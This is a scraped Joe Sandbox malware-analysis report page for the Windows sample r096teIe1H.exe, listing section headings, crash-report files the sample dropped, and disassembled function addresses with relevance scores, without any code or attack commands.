Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_r096teIe1H.exe_9ff8d31d6ce1718a718151b20b7d2ba75dad8_24aa85d4_1ba970a3\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER64AC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69ED.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A3C.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

Windows Analysis Report
r096teIe1H.exe

Function 032BD8B0 Relevance: 200.7, APIs: 12, Strings: 99, Instructions: 6431
COMMON

Function 032A5A90 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 032BCBE8 Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Function 032B7B88 Relevance: 6.0, APIs: 4, Instructions: 32
nativeCOMMON

Function 032B6DC0 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Function 032A1724 Relevance: 9.0, APIs: 7, Instructions: 289
sleepCOMMON

Function 032A1A8C Relevance: 7.7, APIs: 6, Instructions: 175
sleepCOMMON

Function 032B7C04 Relevance: 6.0, APIs: 4, Instructions: 49
libraryloaderCOMMON

Function 032B70D4 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256
COMMON

Function 032AE3E0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 032B6D64 Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Function 032A582C Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 032A7E40 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Function 032C74EC Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Function 032A15CC Relevance: 1.3, APIs: 1, Instructions: 38
memoryCOMMON

Function 032A1682 Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMON

Function 032A16E6 Relevance: 1.3, APIs: 1, Instructions: 25
COMMON

Function 032B75D8 Relevance: .1, Instructions: 69
COMMON

Function 032A415C Relevance: .1, Instructions: 57
COMMON

Function 032BA6F4 Relevance: 64.5, APIs: 16, Strings: 20, Instructions: 1543
librarynativeloaderCOMMON

Function 032BA0C8 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
libraryloaderCOMMON

Function 032B7F54 Relevance: 43.9, APIs: 8, Strings: 16, Instructions: 1882
nativethreadprocessCOMMON

Function 032A58CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139
stringlibraryfileCOMMON

Function 032BCFB0 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 249
processnativesynchronizationCOMMON

Function 032A5B9C Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Function 032B7B14 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
librarynativeloaderCOMMON

Function 032BCB04 Relevance: 6.1, APIs: 4, Instructions: 80
nativefileCOMMON